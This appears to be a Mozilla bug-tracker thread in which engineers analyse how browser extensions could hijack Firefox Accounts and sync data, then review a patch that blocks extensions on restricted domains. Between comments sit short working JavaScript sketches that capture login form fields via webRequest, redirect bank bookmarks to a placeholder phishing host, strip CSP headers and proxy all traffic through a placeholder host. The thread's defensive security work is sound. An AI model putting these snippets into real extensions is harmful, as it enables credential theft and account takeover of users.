Currently WebExtensions can attach content scripts to accounts.firefox.com and listen to traffic using the webRequest API. That means an extension could intercept your user name and password for that site.
If an extension did that, the argument goes, it would then have access to all the data stored in the sync backend. That might be your complete browsing history, for example.
To do this an extension needs to ask for permission for accounts.firefox.com specifically, or for <all_urls>. We are potentially asking the user to make the leap that granting access to <all_urls> might mean "all the browsing history I've synced".
The developer could get access to this by asking for the history API, for example, but that warns the user (hopefully clearly) that they've asked for this.
This assumes that getting access to accounts.firefox.com means that a malicious extension can get access to the browsing history... so cc'ing rkelly for that. Pinging jkt for the security view of this.

> listen to traffic using the webRequest API [...] intercept your user name and password for that site
To be clear, the password doesn't transit the wire in plaintext, they'd have to get it directly out of the password field in the DOM.

(In reply to Ryan Kelly [:rfkelly] from comment #1)
> > listen to traffic using the webRequest API [...] intercept your user name and password for that site
>
> To be clear, the password doesn't transit the wire in plaintext, they'd have
> to get it directly out of the password field in the DOM.
But intercepting what's on the wire is sufficient to log in to the user's account, and to run cracking attacks if they've chosen a weak password.

Note that extensions aren't limited the way packet sniffers are: they can use requestBody to get the unencrypted payload of a POST.
But ... an extension can do the same on google.com or facebook.com or whatever to swipe other valuable credentials. I don't think we should treat something differently just because we operate it unless we have a really specific and compelling reason to do so.
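The requestBody interception described above can be sketched roughly as follows. This is a hedged illustration only: the form field names "email" and "password" are assumptions about the login page, not taken from this bug.

```javascript
// Sketch: how an extension with the "webRequest" permission plus a host
// permission for accounts.firefox.com could read POSTed form fields.
// Field names ("email", "password") are assumptions for illustration.

// Pure helper: pull interesting fields out of a webRequest details object.
function extractCredentials(details) {
  const form = details.requestBody && details.requestBody.formData;
  if (!form) return null;
  return {
    email: form.email ? form.email[0] : undefined,
    password: form.password ? form.password[0] : undefined,
  };
}

// Extension wiring (only runs inside a WebExtension):
if (typeof browser !== "undefined" && browser.webRequest) {
  browser.webRequest.onBeforeRequest.addListener(
    (details) => { console.log(extractCredentials(details)); },
    { urls: ["https://accounts.firefox.com/*"] },
    ["requestBody"] // opts in to the decoded POST payload, pre-TLS
  );
}
```

Note this sees the payload before TLS encryption, which is why "the password doesn't transit the wire in plaintext" doesn't help here if the extension has the right host permission.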

Just to check, I found I couldn't examine the requests made by the sync process to the server using webRequest. We specifically made the decision that system requests are not examinable by webRequest in bug 1279371 and others. However if I open a tab to accounts.firefox.com, or go to about:preferences#sync and sign in, the traffic is observable in webRequest.
The argument here is that storing all your history and bookmarks on a Mozilla server is a feature of Firefox, and hence different from Google or Facebook.

I feel like we had an older bug where some of this stuff was discussed; :vladikoff do you recall?
The counterpoint is that users might reasonably expect e.g. a password-manager addon to work correctly on accounts.firefox.com, and I don't know whether we can enumerate a set of "safe" capabilities to expose that would allow this, without allowing more general access.

I don't know all the capabilities of accounts.firefox.com, but here is what I do know it exposes:
- Account info: username, password
- Other info: picture etc.
- Linked devices
- Delete account
None of which are really problematic beyond being annoying if exploited.
However, an extension could sniff credentials and then use them to modify which extensions a user has installed via sync. That would be an escape hatch from the current permission model.
I would personally suggest this should be restricted unless we have a clear use-case for not doing so.
Even then, I would suggest a new keyword for restricted URLs, like <possibly_insecure>, which initially could be used only by Mozilla-signed extensions.
> I don't know whether we can enumerate a set of "safe" capabilities to expose that would allow this, without allowing more general access.
I don't think there is an alternative here either.

> However given an extension could sniff credentials, then use these to modify what extensions a user has installed on sync.
Oh yes, this is a really good point that I frequently forget about: if you can write data into sync for a user, you can change their list of synced addons, causing new webextensions to be installed.

Installing potentially malicious addon X to force an install of potentially malicious addon Y isn't that useful. Do the malicious work in addon X instead.
If I had access to your sync data, I'd look for the bookmark that points to your bank and rewrite it to my phishing site instead.

> Installing potentially malicious addon X to force an install of potentially malicious addon Y isn't that useful. Do the malicious work in addon X instead.
- I could ask for only *.firefox.com and gain any permission without ever asking for it
- Native messaging, <all_urls>, proxy are the areas I was thinking of
- I could replace existing extensions with fake ones too
- I suspect this exploit could be done with just activeTab too
> bookmark that points to your bank and rewrite it to my phishing site instead.
Arguably, if we don't trust users are checking permissions then an extension could do this also with "bookmarks" and "history" too.
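For what it's worth, the bookmark-rewriting attack mentioned above needs nothing beyond the "bookmarks" permission. A rough sketch (the bank and phishing hosts are placeholders):

```javascript
// Sketch of the bookmark-rewriting attack: requires only the "bookmarks"
// permission. "mybank.example" and "phish.example" are placeholder hosts.

// Walk a bookmark tree and collect nodes whose URL is on the target host.
function findBookmarksOnHost(node, targetHost, out = []) {
  if (node.url) {
    try {
      if (new URL(node.url).hostname === targetHost) out.push(node);
    } catch (e) {
      // ignore unparsable URLs
    }
  }
  for (const child of node.children || []) {
    findBookmarksOnHost(child, targetHost, out);
  }
  return out;
}

// Extension wiring (only runs inside a WebExtension):
if (typeof browser !== "undefined" && browser.bookmarks) {
  browser.bookmarks.getTree().then(([root]) => {
    for (const node of findBookmarksOnHost(root, "mybank.example")) {
      browser.bookmarks.update(node.id, { url: "https://phish.example/login" });
    }
  });
}
```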

> Arguably, if we don't trust users are checking permissions then an extension
> could do this also with "bookmarks" and "history" too.
Let's not make the assumption that users aren't reading the permissions because then everything is moot and we can all just go home, or to the pub.

> Let's not make the assumption that users aren't reading the permissions because then everything is moot
I agree, I was inferring this from your previous statement:
> Installing potentially malicious addon X to force an install of potentially malicious addon Y isn't that useful. Do the malicious work in addon X instead.
If a user is checking the permissions, they would see only "activeTab" requested, which nonetheless results in their whole history/bookmarks/addons being compromised.
I think we are in agreement here that this should be blocked.

In hindsight, I really should have made bug 1361953 a higher risk or chased this more - I was very surprised that it was still open, I thought we had found a clear resolution there. But on reflection, this isn't an easy problem to solve.
We need to do something here and it needs to be holistic. I've been doing some testing of accounts.firefox.com with an extension that has the <all_urls>, webRequest & webRequestBlocking permissions. With these three, a malicious extension can (for example):
* remove the CSP for accounts.firefox.com
* use location: to redirect resources (this would allow redirection of script resources, were it not for SRI)
* read the Authorization header on API requests (and thus spoof sync API requests)
* set fake CORS header so that accounts can be scraped (don't think that gives much in this case)
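A minimal sketch of the first item above (removing the CSP); the listener shape and extraInfoSpec follow the standard webRequest API, and the host pattern is from the scenario being tested:

```javascript
// Sketch: with webRequest + webRequestBlocking and a matching host
// permission, a blocking onHeadersReceived listener can simply drop the
// Content-Security-Policy response header.

function stripCSP(responseHeaders) {
  return responseHeaders.filter(
    (h) => h.name.toLowerCase() !== "content-security-policy"
  );
}

// Extension wiring (only runs inside a WebExtension):
if (typeof browser !== "undefined" && browser.webRequest) {
  browser.webRequest.onHeadersReceived.addListener(
    (details) => ({ responseHeaders: stripCSP(details.responseHeaders) }),
    { urls: ["https://accounts.firefox.com/*"] },
    ["blocking", "responseHeaders"]
  );
}
```

Reading the Authorization header on API requests is the same pattern with an onBeforeSendHeaders listener and the "requestHeaders" extraInfoSpec.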
I'm worried we are just going to end up playing whack-a-mole here though. For example, consider all of the following which can be intercepted currently:
sync.services.mozilla.com
addons.cdn.mozilla.net
accounts-static.cdn.mozilla.net
api.accounts.firefox.com
oauth.accounts.firefox.com
profile.accounts.firefox.com
... etc
This seems like a problem waiting to happen. I'm at a bit of a loss on how to approach this, since I am not aware of a canonical list of subdomains and services that we need to protect here. And then what about services added in the future? I'm going to continue testing, and also talk to the folks (ekr and ckershb) who are looking at rationalising the privileges in the Firefox front-end.
But if anyone can add more information here, I'm all ears.

(In reply to Ryan Kelly [:rfkelly] from comment #6)
> I feel like we had an older bug where some of this stuff was discussed;
> :vladikoff do you recall?
>
> The counterpoint is that users might reasonably expect e.g. a
> password-manager addon to work correctly on accounts.firefox.com, and I
> don't know whether we can enumerate a set of "safe" capabilities to expose
> that would allow this, without allowing more general access.
Maybe this: https://bugzilla.mozilla.org/show_bug.cgi?id=1258135 but there could be more.
There was a related bug to this about content scripts also: `chrome:// scripts can be injected into accounts.firefox.com and are ignored by CSP rules` AKA https://bugzilla.mozilla.org/show_bug.cgi?id=1345210

(In reply to Chris Karlof [:ckarlof] from comment #3)
> Dan, I'm curious about your thoughts as well.
This is one of the downsides of using website UI rather than building it into the client (even if the implementation does an XHR/fetch and builds the UI client-side). We can protect special pages like about: from web extensions (but not from legacy add-ons, of course). See bug 1034526 and bugs duped to it.
We have the same problem with AMO. On the one hand it's a website, and it looks bad to prevent extensions from "enhancing" it like any other site ("favoritism!!"). On the other hand, the original favoritism sin was giving that site extra powers in the first place, so extensions abusing it were much worse than extensions abusing a regular web page. We've really got to stop giving our own web pages magic powers.
Two bad choices: prevent legit extensions from doing helpful stuff on that site, or live with normal extensions (asking to modify all pages is common) having much more actual power than they realize. Given the choice I'd block extensions from mucking with FxA pages. When enough people complain that it's worth rewriting that functionality to have less power then we can unblock it.

(In reply to Daniel Veditz [:dveditz] from comment #15)
> We've really got to stop
> giving our own web pages magic powers.
accounts.firefox.com does have access to webChannels but note that the main "attack" described in this bug is stealing credentials from the login page on accounts.firefox.com, which would be an issue even if webChannels were stripped away.

> accounts.firefox.com does have access to webChannels but note that the main "attack" described
> in this bug is stealing credentials from the login page on accounts.firefox.com, which would
> be an issue even if webChannels were stripped away.
The inverse attack is also possible, a kind of login fixation: a malicious addon could inject scripts into accounts.firefox.com, fire some webchannel messages to sign the browser in to sync with an account under the attacker's control, and then snoop on whatever data the victim's browser syncs to that account.

It's also worth considering explicitly: what measures, if any, does Google take to prevent a Chrome extension from stealing your Google account password? I wasn't able to find any explicit information on this topic from a bit of searching around.

In the past they haven't, but I haven't checked recently. One consequence of preventing add-on access to accounts.firefox.com is that third-party password managers would not be able to automatically capture and fill on accounts.firefox.com.
My motivator for originally raising this with Andy was this update: https://dev.chromium.org/Home/chromium-security/quarterly-updates
Site Isolation
"Running an experiment in M63 to give process isolation to accounts.google.com, to improve Chrome Signin security."
Granted, it's not this issue exactly, but it made me think about what isolation we maybe should be providing in Firefox for Firefox Accounts that we're currently not.

It sounds like the main loss here is the ability for password managers to help with the Firefox Account login. At this point I think that's probably worth the loss in functionality, given the possible security problems that could result. Marking as a P2 and we'll aim to get this done in the 59 or 60 cycle (more likely 60 at this point). If anyone has any concerns about that, please let me know.

So what are you explicitly planning to do here? Note that just blocking accounts.firefox.com is not enough to mitigate the risk here - we need to prevent access to all the domains I mentioned in comment 13, and probably others. If nothing else, the Authorization header sent to sync.services.mozilla.com is almost as sensitive as the user's password.
I don't have a canonical list currently, but I am working on a project with Christoph Kerschbaumer to try to enumerate all the semi-privileged origins in Firefox (included all the web pages with access to chrome features via various event/message passing APIs). Needinfo'ing myself to follow-up once we have that list.
I'm also wondering if WebRequest is the only threat here (cookies API? Others?)

The submitted patch creates a new list based on these conversations; however, I think control of this functionality should be moved to:
https://dxr.mozilla.org/mozilla-central/source/browser/app/permissions
The problem is that some of these issues exist simply because the pages accept password input, which doesn't have restricted APIs. This is an issue in itself, as we need to maintain this list somewhere, as Paul mentioned.
Also, this bug fixes an issue where "privacy.resistFingerprinting.block_mozAddonManager" actually allows content scripts on addons.mozilla.org due to the removal of the addon manager API.

> I don't have a canonical list currently, but I am working on a project with Christoph Kerschbaumer to try to enumerate all the semi-privileged origins in Firefox (included all the web pages with access to chrome features via various event/message passing APIs). Needinfo'ing myself to follow-up once we have that list.
It would be nice if we could unify this in the code somehow. The biggest problem I have with the patch above is it's a list that will get out of date easily.
If you have the ability to test some of the exploits you are worried about with that patch or provide some STRs this would be super helpful.
Do we also care about crash reporting being a vector here?

(In reply to Jonathan Kingston [:jkt] from comment #23)
> > I don't have a canonical list currently, but I am working on a project with Christoph Kerschbaumer to try to enumerate all the semi-privileged origins in Firefox (included all the web pages with access to chrome features via various event/message passing APIs). Needinfo'ing myself to follow-up once we have that list.
Re-adding this need-info
>
> It would be nice if we could unify this in the code somehow. The biggest
> problem I have with the patch above is it's a list that will get out of date
> easily.
At a minimum we need something configurable - I think the list of domains you have here should be a pref, so that we can maintain it without changing code.
>
> If you have the ability to test some of the exploits you are worried about
> with that patch or provide some STRs this would be super helpful.
Well, it's not really exploits. It's just using the APIs as they are intended, but on sensitive domains. The testing I have done so far has just been writing my own addons. But we really need automated tests to make sure we don't regress this. If you are asking "what are all the things we need to block?", I will post that as an attachment, since I have a list but I don't think it's complete yet (basically just from the security model: https://docs.google.com/document/d/1u3IoSbMlMts_dZYkbQEXYY2VNOewTinpXtFCeEYdboo/edit#)
>
> Do we also care about crash reporting being a vector here?
I don't know how this is related? Oh, you mean should we stop extensions messing with crash reports? Yes we should, but I think we already do. I'm not sure what the terminology is, but I believe all network requests initiated from chrome bypass the webRequest API. (I've heard these called "system requests".)

So as for a proposal, I think we need a preference containing a blacklist of semi-privileged domains which we want to forbid extensions from accessing, and then a consistent approach for enforcing that. Below are the APIs and features that I am aware of that need to take these semi-privileged domains into account. (Andrew, Kris, others, please review this; it is a best effort from my understanding of the code I have reviewed.)
1. Manifest attributes
- Host permissions
  - must not be able to request a URL that matches the blacklist [1]
  - <all_urls> must not include the blacklist
  - the "matches" parameter of the content_scripts manifest key must follow the same behavior as host permissions
2. APIs which respect host permissions (i.e. should not be allowed on blacklisted domains)
- tabs.executeScript
- contentScripts.register
- webRequest & webRequestBlocking
- cookies
- activeTab MUST NOT grant access on semi-privileged domains
3. Sensitive APIs which are currently an issue
- Proxy API - this basically does the same thing as webRequest, but it is not origin bound.
- Devtools - this can currently interact in a variety of ways, including injecting script (see bug 1425197)
[1] Does installation reject an addon that requests a blacklisted domain, or just silently not grant permission?
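As a concrete sketch of the kind of check this blacklist pref implies (the pref name and the exact-host-match semantics here are assumptions for illustration, not the shipped implementation):

```javascript
// Hypothetical sketch of a pref-driven restricted-domain check: host
// permissions, content scripts, activeTab etc. would all consult a single
// blacklist read from a preference. Pref name is an assumption.
const kRestrictedDomainsPref = "extensions.webextensions.restrictedDomains";

// Parse the comma-separated pref value into a set of hostnames.
function parseRestrictedDomains(prefValue) {
  return new Set(
    prefValue.split(",").map((d) => d.trim()).filter((d) => d.length > 0)
  );
}

// Exact-host match only; whether subdomains should also be blocked is an
// open question in this bug (see the later comments).
function isRestrictedHost(host, restricted) {
  return restricted.has(host);
}
```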

> [1] Does installation reject an addon that requests a blacklisted domain, or just silently not grant permission?
I think at least for now silently failing is fine. Especially if, say, we decide mozilla.org or newsite.pocket.com is banned for extension compat, just breaking the script rather than breaking the install is likely better.
I still have much more testing to do; we likely will want a test for each of the scenarios highlighted by Paul in comment 25.

Hi Jonathan, for another Bugzilla issue (which is listed in the ones blocked on this one) we are going to introduce a similar check from privileged JS code. Do you mind exposing the new WebExtensionPolicy::IsRestrictedSite method from WebExtensionPolicy.webidl as well?
(As a side effect it would also allow writing unit tests for the WebExtensionPolicy::IsRestrictedSite method itself as an xpcshell test.)

Reviewing :jkt's patch (https://bugzilla.mozilla.org/attachment.cgi?id=8949037&action=diff), I can tell that it will not cover every case.
The problem is not limited to semi-privileged Mozilla URLs. It applies to any Firefox feature running in privileged mode that performs actions based on information exchanged with a remote server. For example, one could set up their own Firefox Account server; the proposed patch obviously will not prevent an extension from eavesdropping on or spoofing sync data exchanged with a privately owned server.
In the short term the patch could minimize risk, but in the end another solution should be put in place.
A long-term solution I could think of is having a "firefox privileged url" type for preferences. Extension limitations would then be applied to every URL flagged as "firefox privileged url". To enable this, one would have to go through all URLs used by privileged components and flag them as such.
Note:
- On a side note, introducing other types for preferences could be a good thing from a security perspective. For example, preferences that are meant to contain JSON could not be set to invalid JSON that an attacker could exploit via error mishandling.

FLR: That seems out of scope here; we aren't trying to catch all internal browser calls to third-party URLs. Granted, we might want to consider that in a different bug, especially for Tor users wishing to ensure the browser's calls can't be intercepted. My understanding is that browser-context calls are restricted from extensions in most cases anyway.
The scope of this bug is more about non-privileged calls from content pages to URLs that have extra permissions within the browser via other means. So accounts.firefox.com could allow an extension to modify the user's sync account and escalate privileges etc. Given we are now using the pref, if there is a way for a user to sync to a different URL, we could edit the pref within the browser too.

Hey, so unfortunately I won't be able to continue working on this. I wrapped up the patch so that I think it could either be picked up for further work or merged as is.
There aren't as many tests as I would like here, but it feels pretty urgent to cover all the cases that Paul highlighted.
I hit some road bumps that really slowed me down here:
- I couldn't get xpcshell tests to work with a different hostname (mozilla.org); I added a new identity but it didn't proxy locally as I would have expected it to elsewhere.
- The pref isn't live which perhaps isn't a problem in product, however it makes testing pretty hard.
I need to move onto something else but I want to ensure this doesn't bitrot. Even if this doesn't cover all cases I think the patch is worth dropping in given the risks here.

Comment on attachment 8951578 [details] [diff] [review]
bug-1415644-b.patch
Kris is a great pick to review this patch, especially given that most of the changes are applied on WebExtensionPolicy and ChannelWrapper.

Comment on attachment 8955844 [details] [diff] [review]
Create a list of restricted domains
Review of attachment 8955844 [details] [diff] [review]:
-----------------------------------------------------------------
Sorry for redirection but Shane should probably take a look at the webrequest bits.
This could use a test, as it is completely broken right now due to a typo in the pref name...
Much more importantly though, is this really maintainable? How are we going to keep this list updated? Do new services that use Firefox accounts have to get a change to this pref shipped before they can be deployed?
::: toolkit/components/extensions/WebExtensionPolicy.cpp
@@ +35,5 @@
> <body>\n\
> </html>";
>
> +static const char kRestrictedDomainPref[] =
> + "extensions.webextensions.identity.redirectDomain";
redirectDomain -> restrictedDomains

(In reply to Andrew Swan [:aswan] from comment #44)
> This could use a test, as it is complete broken right now due to typo in the
> pref name...
No tests for security bugs until they ship.
> Much more importantly though, is this really maintainable? How are we going
> to keep this list updated? Do new services that use Firefox accounts have
> to get a change to this pref shipped before they can be deployed?
No idea.
> ::: toolkit/components/extensions/WebExtensionPolicy.cpp
> @@ +35,5 @@
> > <body>\n\
> > </html>";
> >
> > +static const char kRestrictedDomainPref[] =
> > + "extensions.webextensions.identity.redirectDomain";
>
> redirectDomain -> restrictedDomains
wat... I have no idea how that got changed. It was definitely the right pref when I tested.

(In reply to Andrew Swan [:aswan] from comment #44)
> Much more importantly though, is this really maintainable? How are we going
> to keep this list updated? Do new services that use Firefox accounts have
> to get a change to this pref shipped before they can be deployed?
Perhaps we can try (post-release) to tie the list to the intercepted requests / preffed-to-localhost domains in test prefs?

(In reply to :Gijs (under the weather; responses will be slow) from comment #48)
> Perhaps we can try (post-release) to tie the list to the intercepted
> requests / preffed-to-localhost domains in test prefs?
Assuming you're talking about build/pgo/server-locations.txt I'm not seeing a connection, there's not much overlap between the list of hosts in the attached patch and the contents of that file...
(In reply to Matthew N. [:MattN] (PM if requests are blocking you) from comment #49)
> Comparing to the default permissions in
> https://dxr.mozilla.org/mozilla-central/source/browser/app/permissions would
> also be helpful to catch new privileged origins.
Yeah, this would help us catch (some) sites to which the browser grants extra privileges but my understanding is that the patch attached here tries to enumerate all the domains that use Firefox accounts. Most of those sites don't have any special access to browser features, they just happen to use fxa for authentication. Relying on the browser having a complete and up-to-date list of such sites sounds like something almost guaranteed to fail.

(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #45)
> (In reply to Andrew Swan [:aswan] from comment #44)
> > This could use a test, as it is complete broken right now due to typo in the
> > pref name...
>
> No tests for security bugs until they ship.
Should still be a separate test patch.

Comment on attachment 8956152 [details] [diff] [review]
Create a list of restricted domains
Looks reasonable for what it's doing. While existing tests should cover most of this, I'd still like to see the test patch ready before landing, since there are some differences (e.g. pref change support, lack of requestBody for our special flavour of website). I kind of question the pref observer... do we expect the restrictedDomains list to be modified at runtime, and if so how is that happening (i.e. do we intend to do hotfixes to update this or something)?

(In reply to Andrew Swan [:aswan] from comment #54)
> Maybe its best to have somebody with stronger c++ chops take a look at this,
> but doesn't this keep referencing (but never unrefing) the underlying
> AtomSet?
If you mean AddRefing, no, AtomSet is not refcounted. Get() returns a reference to the instance that is owned by the AtomSetPref.

Comment on attachment 8956152 [details] [diff] [review]
Create a list of restricted domains
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Not terribly easily. It contains a list of interesting domains that a malicious extension might try to extract Mozilla services API/auth tokens from, but it doesn't suggest any particular reason that accessing those domains might be interesting.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
No.
Which older supported branches are affected by this flaw?
All.
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
No. It would not be hard to backport to 59 release, but it also would not be worth the risk.
How likely is this patch to cause regressions; how much testing does it need?
Not very likely. It should only affect extensions which access certain internal Mozilla domains, most of which are CDNs or API endpoints. Several of them already have restricted access, so the likelihood of this breaking legitimate production extensions is fairly low.

(In reply to FLR from comment #58)
> Comment on attachment 8956152 [details] [diff] [review]
>
> Just wondering, wouldn't it be better if sub domains of the restricted
> domain list were also considered as restricted ?
Perhaps, but that check would be much more expensive.

(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #43)
> (In reply to Paul Theriault [:pauljt] from comment #42)
> > See also 1443073 - we need to do something about google analytics, too
> > right? No idea what though.
>
> Do we?
I didn't understand the nature of the mechanism you added. The attack I was thinking of was intercepting the loading of a script that is included on AMO. I assumed that for webRequest the blocking would be done on the request's URL, and thus intercepting google analytics on AMO would still be allowed (since it isn't on the blacklist). But I see from testing that the check is on the URL of the document which triggered the request (is that correct?).
I was also concerned that if you intercepted google analytics on a different domain, you could poison the cache for AMO. But as far as I can tell from testing, modifications made by filterResponseData are not stored in the cache (that is, only the original response is cached, not the modified one - is that correct?).
So from what I can tell, any domain in this restricted list:
- can not have a content script injected into it (via manifest, contentScripts.register() or tabs.executeScript())
- webRequest events will not be sent for tabs with a document that matches one of the blocked domains
- can not use Devtools API to inject script (browser.devtools.inspectedWindow.eval)
Is my understanding correct? I've added this to the security model document [1]. Please let me know if I've misunderstood anything here.
Note that one API that lives outside these restrictions is the Proxy API. This makes sense, I think: Proxy can already be used to intercept any URL, including system requests (like update requests etc.); restricting it would break the usefulness of being able to set the network proxy. But our add-on review team should probably be aware of the sensitive nature of the Proxy permission.
[1] https://docs.google.com/document/d/1u3IoSbMlMts_dZYkbQEXYY2VNOewTinpXtFCeEYdboo/edit#
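To illustrate the Proxy API point above, a sketch using the proxy.onRequest form of the API (the proxy host is a placeholder): the listener fires for any URL, restricted domains included, though as noted below, for HTTPS a proxy without a trusted certificate learns little beyond the hostname.

```javascript
// Sketch: the "proxy" permission sits outside the restricted-domains
// checks. A proxy.onRequest listener sees every request URL.
// "proxy.example" is a placeholder for an attacker-controlled host.
function proxyFor(url) {
  // Route everything through the placeholder proxy.
  return { type: "http", host: "proxy.example", port: 8080 };
}

// Extension wiring (only runs inside a WebExtension):
if (typeof browser !== "undefined" && browser.proxy && browser.proxy.onRequest) {
  browser.proxy.onRequest.addListener(
    (details) => proxyFor(details.url),
    { urls: ["<all_urls>"] }
  );
}
```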

(In reply to Paul Theriault [:pauljt] from comment #64)
> (In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're
> blocked) from comment #43)
> So from what I can tell, any domain in this restricted list:
> - can not have a content script injected into it (via manifest,
> contentScripts.register() or tabs.executeScript())
> - webRequest events will not be sent for tabs with a document that matches
> one of the blocked domains
> - can not use Devtools API to inject script
> (browser.devtools.inspectedWindow.eval)
>
> Is my understanding correct? I've added this to the security model document
> [1]. Please let me know if I've misunderstood anything here.
So, there are a few different sets of restrictions here:
- Extensions cannot see requests unless they have permissions for the domains of
both the requested URL and for the document requesting the URL. As of this bug,
that check also takes into account the restricted domains list.
- Extensions cannot modify requests if they don't have permission to see them,
per the above, or if the document the request belongs to has access to the
mozAddonManager API. As of this bug, this restriction also applies to the
StreamFilter API.
- Extensions cannot load content scripts into any domain that they do not have
host permissions for, any site that has access to the mozAddonManager API, or,
as of this bug, any domain on the restricted domains list.
- Extensions cannot make non-CORS requests to any domain they do not have host
permissions for or, as of this bug, any domain on the restricted domains list.
They can still make requests to domains with mozAddonManager access as long as
they are not also on the restricted domains list (which I believe they all are).
The behavior introduced by this bug is less lenient, since one of the concerns
was the possibility of getting access to Firefox Accounts tokens. We didn't have
that concern when restricting access to the mozAddonManager API.
> Note that one API that lives outside these restrictions is the Proxy API.
> This make sense I think: Proxy can already be used to intercept any URL,
> including system requests (like update requests etc)- which makes sense,
> otherwise it would break the usefulness of being able to set the network
> proxy. But our add-on review team should probably be aware of the sensitive
> nature of the Proxy permission.
I'm not especially concerned about the proxy API here. The sites that we're
restricting access to here, and all of the resources they load, should only be
accessible over HTTPS. Unless the proxy they're being forwarded to has a trusted
certificate for those sites, they shouldn't be able to cause any problems beyond
DOS. If they do have access to trusted certificates for those sites, we have
bigger problems.